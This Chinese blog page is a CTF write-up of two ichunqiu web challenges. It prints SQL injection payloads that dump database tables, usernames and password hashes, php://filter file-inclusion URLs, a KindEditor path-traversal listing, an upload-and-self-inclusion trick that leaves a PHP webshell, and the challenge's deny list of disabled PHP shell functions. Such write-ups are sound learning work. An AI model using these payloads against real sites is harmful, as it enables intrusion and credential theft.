<!DOCTYPE HTML>
<html class="no-js" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.8.0">
    <!--[if lte IE 9]>
<meta http-equiv="refresh" content="0;url=http://yoursite.com/warn.html">
<![endif]-->
<meta charset="utf-8">
<meta http-equiv="X-DNS-Prefetch-Control" content="on">
<link rel="dns-prefetch" href="http://yoursite.com">
<link rel="dns-prefetch" href="//www.google-analytics.com">
<link rel="prefetch" href="http://yoursite.com">
<link rel="prefetch" href="//www.google-analytics.com">


<link rel="prerender" href="http://yoursite.com">

<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="renderer" content="webkit">
<meta name="viewport" content="width=device-width, initial-scale=1.0,user-scalable=no">
<meta http-equiv="mobile-agent" content="format=html5; url=http://yoursite.com">
<meta name="author" content="John Doe">
<link rel="stylesheet" href="/css/JSimple.css">

<link rel="shortcut icon" href="/images/favicon.png">


<title>blog - Hexo</title>

<meta name="keywords" content>

<meta name="description " content>

    <script type="text/x-mathjax-config">
        MathJax.Hub.Config({
            tex2jax: {
                inlineMath: [ ['$','$'], ["\\(","\\)"] ],
                processEscapes: true
            }
        });
    </script>


    

    

</head>
<body>
<div id="nav">
    <nav class="nav-menu">
        <a class="site-name current" href="/" title="说">说</a>
        <a class="site-index current" href="/"><i class="fa fa-home"></i><span>Home</span></a>
        <a href="/archives" title="Archives"><i class="fa fa-archives"></i><span>Archives</span></a>
        <a href="/tags" title="Tags"><i class="fa fa-tags"></i><span>Tags</span></a>
        <!-- custom single page of menus -->
        
        
        <a href="/help" title="帮助">
            <i class="fa fa-question-circle"></i>
            <span>帮助</span>
        </a>
        
    </nav>
</div>

<div class="nav-user">
    <a class="btn-search" href="#"><i class="fa fa-search"></i></a>
    <a class="btn-read-mode" href="#"><i class="fa fa-sun-o"></i></a>
    <a class="btn-sns-qr" href="javascript:"><i class="fa fa-telegram"></i></a>
</div>

<div id="wrapper" class="clearfix">
    <div id="body">
        <div class="main" id="main">
            <div id="cover">
    <div class="cover-img"></div>
    <div class="cover-info">
        
        <h1 class="cover-siteName">说IT</h1>
        <h3 class="cover-siteTitle">用代码摇滚这个世界</h3>
        <p class="cover-siteDesc">一个关注技术与人文的IT博客</p>
        <div class="cover-sns">
            
    &nbsp;&nbsp;<div class="btn btn-telegram">
        <a href="http://t.me/kunyintang" target="_blank" title="telegram" ref="friend">
            <i class="fa fa-telegram"></i>
        </a>
    </div>

    &nbsp;&nbsp;<div class="btn btn-instagram">
        <a href="https://www.instagram.com/mtangsir/" target="_blank" title="instagram" ref="friend">
            <i class="fa fa-instagram"></i>
        </a>
    </div>

    &nbsp;&nbsp;<div class="btn btn-twitter">
        <a href="https://twitter.com/tangkunyin" target="_blank" title="twitter" ref="friend">
            <i class="fa fa-twitter"></i>
        </a>
    </div>

    &nbsp;&nbsp;<div class="btn btn-github">
        <a href="https://github.com/tangkunyin" target="_blank" title="github" ref="friend">
            <i class="fa fa-github"></i>
        </a>
    </div>


        </div>
    </div>
</div>

            <div class="page-title">
    <ul>
        <li><a href="/">Recent Posts</a></li>
        
        
        
        <li class="page-search">
    <form id="search" class="search-form">
        <input type="text" readonly="readonly" id="local-search-input-tip" placeholder="click to search...">
        <button type="button" disabled="disabled" class="search-form-submit"><i class="fa fa-search"></i></button>
    </form>
</li>

    </ul>
</div>
<div class="main-inner">
    <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
        <div class="post-header">
            <div class="post-author clearfix">
                <a class="avatar fleft" href="https://shuoit.net" target="_blank">
                    <img width="48" src="/images/favicon.png" alt="avatar">
                </a>
                <p><span class="label">Author</span>
                    <a href="https://shuoit.net" target="_blank">纠结伦</a>
                    <span title="Last edited at&nbsp;2019-05-19">2019-05-19</span>
                </p>
                <p>一个搬🧱的劳斯基😁️️</p>
            </div>
            <h2 class="post-title">blog</h2>
            <div class="post-meta">
                emm... 4145 words in the article |
                you are the&nbsp;<span id="busuanzi_value_page_pv"><i class="fa fa-spinner fa-spin"></i></span>th friend who reading now
            </div>
        </div>
        <div class="post-content markdown-body">
            <h2 id="Blog"><a href="#Blog" class="headerlink" title="Blog"></a>Blog</h2><p>今天做了这道题学习到了很多，我主要参考了网上大佬的思路，大佬的链接如下：<br><a href="https://xuanxuanblingbling.github.io/ctf/web/2018/03/21/blog/" target="_blank" rel="noopener">https://xuanxuanblingbling.github.io/ctf/web/2018/03/21/blog/</a><br>然后就是我自己的总结了。。。。。<br>首先打开网页，注册了个账户，然后登陆，可以看到post那里，尝试是否存在注入。<br>在正文标题处尝试注入以下内容：<br>a’ or ‘1’=’1   结果为：1<br>a’ or ‘1’=’2          0<br>a’ and ‘1’=’1         0<br>a’ and ‘1’=’2         0<br>后来考虑这里是发博客，猜测内部格式应该如下：<br>insert into article (date, title, content) values (‘2018-03-21’,’inject here’,’content’);<br>后来大佬给的注入方式如下：<br>[payload]:1’,’2’),(user(),’<br>[sql]:insert into article (date, title, content) values (‘2018-03-21’,’1’,’2’),(user(),’’,’content’);<br>[decode]:select unhex(conv(125822936825964,10,16));<br>这样实际上就多了一条插入的记录，可以在下一条记录的相应的位置卡看到相应的数据，但采取此种方式注入，要先测验处字段数目以及那些字段的值最后是可见的。<br>检查后字段：<br>0’)#<br>0’,’1’)#<br>0’,’1’,’2’)#<br>最后0’,’1’)#正确，所以本字段后面有一个字段。<br>检查前字段：<br>0’,’1’),(‘<br>0’,’1’),(‘1’,’<br>0’,’1’),(‘1’,’2’,’<br>0’,’1’),(‘1’,’2’,’3’,’<br>最后0’,’1’),(‘1’,’2’,’正确，需哦一本字段前面有两个字段。<br>最后一共有4个字段。这里我思考了很长时间，我猜测它的内部结构应该为<br>insert into article (username, title, content，X) values (‘111’,’inject here’,’content’，’X’);我也不清楚这里最后一段字段X是什么，不过不影响后面的注入。<br>接下来开始一步步的注入：<br>0’,’1’),(‘111’,database(),’<br><img src="/2019/05/19/blog/blog-e3109b20.png" alt><br>0’,’1’),(‘111’,(select group_concat(table_name) from information_schema.tables where table_schema=’miniblog’),’<br><img src="/2019/05/19/blog/blog-444456ce.png" alt><br>0’,’1’),(‘222’,(select group_concat(column_name) from information_schema.columns where table_name=’users’),’<br><img src="/2019/05/19/blog/blog-c207974f.png" alt><br>0’,’1’),(‘333’,(select group_concat(username) from users ),’<br><img src="/2019/05/19/blog/blog-e1ffae90.png" alt><br>这里的111应该是我一开始注册的用户名<br>0’,’1’),(‘444’,(select group_concat(password) from users ),’<br>最后的结果：<br>3177d917a0053c6161207e733c84356d,698d51a19d8a121ce581499d7b701668<br>md5解一下码：<br>19-10-1997，111<br>第二个密码应该为我注册时的密码。<br>然后用admin登录就可访问到：<br><a href="http://2abf4c9939734cf09fc594d4c577ffedba79892684a84542.changame.ichunqiu.com/blog_manage/manager.php?module=article_manage&amp;name=php" target="_blank" rel="noopener">http://2abf4c9939734cf09fc594d4c577ffedba79892684a84542.changame.ichunqiu.com/blog_manage/manager.php?module=article_manage&amp;name=php</a><br>然后就是文件包含了，payload如下：<br><a href="http://225161df71684d5286170732c32356bc29b8cd3b3e3344f9.game.ichunqiu.com/blog_manage/manager.php?module=php://filter/read=convert.base64-encode/resource=../flag&amp;name=php" target="_blank" rel="noopener">http://225161df71684d5286170732c32356bc29b8cd3b3e3344f9.game.ichunqiu.com/blog_manage/manager.php?module=php://filter/read=convert.base64-encode/resource=../flag&amp;name=php</a><br>最后再base64解一下码就可以了。。</p>
<h2 id="Blog进阶"><a href="#Blog进阶" class="headerlink" title="Blog进阶"></a>Blog进阶</h2><p>这道题也参考了另一位大佬的博客：<br><a href="https://blog.csdn.net/qq_30123355/article/details/58165038" target="_blank" rel="noopener">https://blog.csdn.net/qq_30123355/article/details/58165038</a><br>这个题是在上一道题的基础上进行了难度加大<br>首先这里不能用PHP：//file伪协议，在发博客的post.php处查看到编辑器的信息：KindEditor 4.1.10 (2013-11-23)，所以得先去网上找一下它的漏洞，找到了一个。<br>Kindeditor特定情况可能会导致全盘浏览：<br><a href="http://www.anquan.us/static/bugs/wooyun-2014-067044.html" target="_blank" rel="noopener">http://www.anquan.us/static/bugs/wooyun-2014-067044.html</a><br>利用如下路径可以以读到整个web服务的目录情况：<br><a href="http://225161df71684d5286170732c32356bc29b8cd3b3e3344f9.game.ichunqiu.com/kindeditor/php/file_manager_json.php?path=../../" target="_blank" rel="noopener">http://225161df71684d5286170732c32356bc29b8cd3b3e3344f9.game.ichunqiu.com/kindeditor/php/file_manager_json.php?path=../../</a><br>该思路的原理是：PHP在以enctype=multipart/form-data方式POST文件时，不论POST到哪个文件，PHP都会在临时目录中生成一个临时文件名，然后调用脚本处理该临时文件，最后删除这个临时文件于是乎新的攻击思路成形了：可以POST到phpinfo.php文件，这样可以直接获得临时文件的路径和名称，然后在PHP删除临时文件之前包含这个临时文件即可。这里最麻烦的是如何在临时文件被删除之前包含它通常有这么几种考虑：<br>1.上传大文件，这样PHP的处理就会变慢，经过实际测试，大概3M左右的时候就可以肉眼看到生成的临时文件了，虽然会很快被删除，但是这里确实能看到从生成到删除的全过程了<br>2.通过大量请求来延迟PHP脚本的处理速度</p>
<p>整理下php对一个post文件请求的正常处理流程：<br>1.manager.php接收一个Post请求，php在/tmp目录下创建我们post的文件<br>2.manager.php处理请求url，包含一个文件<br>3.manager.php进行文件处理<br>4.php删除/tmp目录下的临时文件</p>
<p>整理下这个漏洞的触发过程：</p>
<ol>
<li>manager.php接收一个Post请求，php在/tmp目录下创建我们post的文件<br>2.manager.php处理请求url，不断自包含本身造成内存溢出<br>3.php发出内存溢出信号，清空缓冲区和调用堆栈，以便接收新的请求<br>4./tmp目录下的上传文件得以保留<br>5.包含/tmp目录下的上传文件形成webshell</li>
</ol>
<p>接下来构造一个本地的payload，通过这个payload递送一个post请求包含一个文件的同时使manager.php自包含溢出崩溃：</p>
<p><body><br>    <form name="uploadform" method="POST" enctype="multipart/form-data" action="http:/dc627b05749a4888b113fc3349ae5e143da2374239f3465c.changame.ichunqiu.com/blog_manage/manager.php?module=manager&name=php"><br>          uploadfile1:<input type="file" name="file1" size="30"><br>        <input type="submit" name="submit" value="submit"><br>    </form><br></body><br>然后在本地打开，界面如下：<br><img src="/2019/05/19/blog/blog-51bcda45.png" alt><br>然后上传一个php文件phpinfo<br>界面一直这个状态，说明它不停地在自包含，等一会重新再打开这个界面：<br><img src="/2019/05/19/blog/blog-a0c907a6.png" alt><br>结果再访问一次tmp：<br><img src="/2019/05/19/blog/blog-1dc0ce1f.png" alt><br>看到了文件名，接下来访问：<br><a href="http://2f214b095a5f4812af6256eaabea4dcca38fc9f064014b4a.ctf.game/blog_manage/manager.php?module=../../../../tmp/phpXhuisG&amp;name=" target="_blank" rel="noopener">http://2f214b095a5f4812af6256eaabea4dcca38fc9f064014b4a.ctf.game/blog_manage/manager.php?module=../../../../tmp/phpXhuisG&amp;name=</a><br>得到下图：<br><img src="/2019/05/19/blog/blog-dd8a9d67.png" alt><br>接下来会发现题作者禁用了相当多的函数：<br>exec,passthru,shell_exec,assert,eval,glob,imageftbbox,bindtextdomain,mkdir,dir, system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,symlink,chgrp,chmod,chown,dl,mail,readlink,stream_socket_server,fsocket, imap_mail,apache_child_terminate,posix_kill,proc_terminate,proc_get_status,syslog,openlog,ini_alter,chroot,fread,fgets,fgetss,file,readfile, ini_set,ini_restore,putenv,apache_setenv,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,file_get_contents,fpassthru,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,fputs,unlink, pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority, pcntl_setpriority<br>丧心病狂啊。。。。。<br>但是大佬们却发现没有禁用show_source<br>于是再传一次php：<br>&lt;?php show_source(‘/var/www/html/flag.php’)?&gt;<br><img src="/2019/05/19/blog/blog-3aebe774.png" alt><br>可以看到此时两个文件了，再次访问最新的那个，可以看到flag：<br><img src="/2019/05/19/blog/blog-d96c7d2f.png" alt></p>
<h2 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h2><p>这道题忙活了一个下午。。。。。不过收获很大。。继续加油</p>

        </div>
        <div class="post-tool">
            <a class="btn-thumbs-up" href="javascript:void(0);" data-cid="52" title="95">
                <i class="fa fa-thumbs-up" aria-hidden="true"></i> Donate
            </a>
        </div>
        
        <div class="post-tags">Tags：
            
        </div>
        
    </article>
    
    <p style="text-align: center">This article just represents my own viewpoint. If there is something wrong, please correct me.</p>
    
    

    

</div>
<script src="/js/busuanzi.pure.mini.js"></script>


        </div><!-- end #main-->
    </div><!-- end #body -->
    <footer class="footer">
    <div class="footer-inner" style="text-align: center">
        <p>
            <a href="/about" title="About">About</a>&nbsp;&nbsp<em>·</em>&nbsp;&nbsp
            <!-- 自定义链接 -->
            <a href="/help" title="Help">Help</a>&nbsp;&nbsp<em>·</em>&nbsp;&nbsp
            <a href="/links" title="Links">Links</a>&nbsp;&nbsp<em>·</em>&nbsp;&nbsp
            <a href="/sitemap.xml" title="SiteMap">SiteMap</a>
        </p>
        <p>
            Has been established&nbsp<a href="/timeline" id="siteBuildingTime"></a>&nbspDays，<a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="licence">Based on Attribution-NonCommercial-ShareAlike 4.0 International (CC BY-NC-SA 4.0)</a><br>
            ©2017-<span id="cpYear"></span> Based on&nbsp<a href="http://hexo.io" target="_blank" rel="nofollow">Hexo</a>
            ，Theme by&nbsp&nbsp<a href="https://github.com/tangkunyin/hexo-theme-jsimple" target="_blank" rel="bookmark">JSimple</a>
            ，Author&nbsp<a href="https://shuoit.net" target="_blank" rel="friend">纠结伦</a>
            ，Hosted by <a href="https://pages.github.com/" target="_blank" rel="nofollow">GitHub Pages</a>
        </p>
    </div>
</footer>
<script src="/js/SimpleCore.js"></script>

</div>
<!-- search pop -->
<div class="popup search-popup local-search-popup">
    <div class="local-search-header clearfix">
        <span class="search-icon">
            <i class="fa fa-search"></i>
        </span>
        <span class="popup-btn-close">
            <i class="fa fa-times-circle"></i>
        </span>
        <div class="local-search-input-wrapper">
            <input id="local-search-input" spellcheck="false" type="text" autocomplete="off" placeholder="Input query keywords here...">
        </div>
    </div>
    <div id="local-search-result"></div>
</div>
<div class="fixed-btn">
    <a class="btn-gotop" href="javascript:"> <i class="fa fa-angle-up"></i></a>
</div>
<script>
    $(function () {
        var jsi_config = {
            buildingTime: '01/20/2018',
            current: $('.post-tags').length > 0 ? 'post' : 'archive',
            snsQRCode: '/images/sns-qrcode.png',
            donateImg: '/images/donate-qr.png',
            localSearch: { dbPath: '' },
            readMode: 'day'
        };
        
        SimpleCore.init(jsi_config);
        
    });
</script>
</body>
</html>
